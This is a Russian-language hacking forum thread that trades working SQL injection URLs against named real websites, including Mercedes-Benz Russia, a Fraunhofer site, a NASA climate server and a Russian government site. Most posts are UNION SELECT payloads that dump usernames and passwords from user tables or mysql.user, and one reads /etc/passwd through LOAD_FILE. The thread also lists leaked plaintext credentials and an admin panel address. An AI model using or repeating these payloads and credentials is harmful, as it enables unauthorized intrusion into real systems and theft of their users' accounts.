SQL Инъекции

Code:

http://video.antichat.ru/search/action=search&type=search&search=Zfailure&logic=AND&where=nick&group=no&order=id&vozr='DESC&str=0&b=&hotlog=&str=1

Собственно интересный комент)))

 

http://dewerelddraaitdoor.vara.nl/nieuws_media.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

 

Всего 5

Code:

http://www.mercedes-benz.ru/company/news/?id=-342%20union%20select%201,2,3,4,5/*

 

Code:

http://anmeldung.iao.fraunhofer.de/veranstaltung.php?id=-186%20UNION%20SELECT%201,2,3,4,5,6,7,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+from+mysql.user/*

может уже и было

 

Code:

http://www.devicecom.ru/anonce/index.php?id=-1+union+select+1,2,3,4,5,concat(login,0x3a,pass),7,8,9,10,11+from+users+limit+0,1/*&np=1&bl=np

пассы в чистом виде
dev:L3GWo1ZYj3
iuser:JXnYE0Upk7
SergeyDC:06062006
админка http://www.devicecom.ru/admin

 

Перехожу на gov* =)

www.rosprom.gov.ru

Code:

http://www.rosprom.gov.ru/snews.php?id=-1+union+select+1,2,3,4,5,6/*

 

PHP:

http://www.punkbands.com/reviews.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,version(),31,32,33,34,35,36,37/*


Что-то я сегодня слабо...Наверное потомучто после длительного периода в школу пошел...

 

http://www.artsalivesb.com/pages.php?id=-4+union+select+1,2,convert(version()+using+latin1),4

 

to \6/
Помоему пасс в чистом виде??)

Code:

http://www.artsalivesb.com/pages.php?id=-4+union+select+1,2,convert(password+using+latin1),4+from+users/*

 

_http://www.piratesinfo.com/biography/biography.php?article_id=-1+union+select+1,2,concat(username,0x3a,password,0x3a,email,0x3a,0x3a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+phorum_users/*

 

http://www.magicmarkerrecords.com/bandPage.php?id=-6+union+select+1,2,3,4,5,version()

 

climate.gsfc.nasa.gov

hekk!

Code:

http://climate.gsfc.nasa.gov/personnel/viewperson.php?id=99'+union+select+1,2,concat(fname,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+personnel+limit+2,1/*

 

Code:

http://www.dengi-info.com/news/?nid=-1+union+select+concat(database(),char(58),user()),2,3,4,5,6/*

Что то так и не докопался до таблиц к админке.

 

Code:

http://www.infodirekt.se/item.php?id=-1+union+select+1,2,3,4,table_name,5,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*

Code:

http://www.climbzone.ru/galer.php?id=-1+union+select+1,concat(username,char(58),user_password),3+from+phpbb_users/*

___

Во таблицы масивом выводится, почаще бы так))))

 

Code:

http://www.kevinsdjschool.com/gallery/addcomment.php?pid=-89+union+select+1,2,3,concat(user,0x3a,pass,0x3a,id),5,6+from+users/*

Пассы в чистом виде

 

http://www.bhmdiocese.org/viewapostolate.php?id=-4+union+select+1,2,version(),4

 

с этими ничего не сделал:

Code:

__http://www.sscnet.ucla.edu/issr/csup/pubs/papers/item.php?id=31+group+by+17/*
__http://www.merrimack.edu/generator.php?id=1222'
__http://www.ee.virginia.edu/profile.php?ID=8+order+by+22/*

а в этой не добрался до таблиц, и фильтрация на кавыки

Code:

__http://www.eng.wayne.edu/page.php?id=5+union+select+1,convert(version()+using+latin1),3,4,5,6/*
__http://www.eng.wayne.edu/page.php?id=5+union+select+1,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),3,4,5,6/*

 

http://www.trinityfoundation.org/new_article.php?id=-8+union+select+1,2,3,version(),5,6,7,8/*

 

Code:

http://www.survival-international.org/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

нужен мозг) не могу подобрать tablename

 

http://www.gamingreport.com/article.php?sid=-11+union+select+1,2,3,version(),5,6,7,8,9,10,11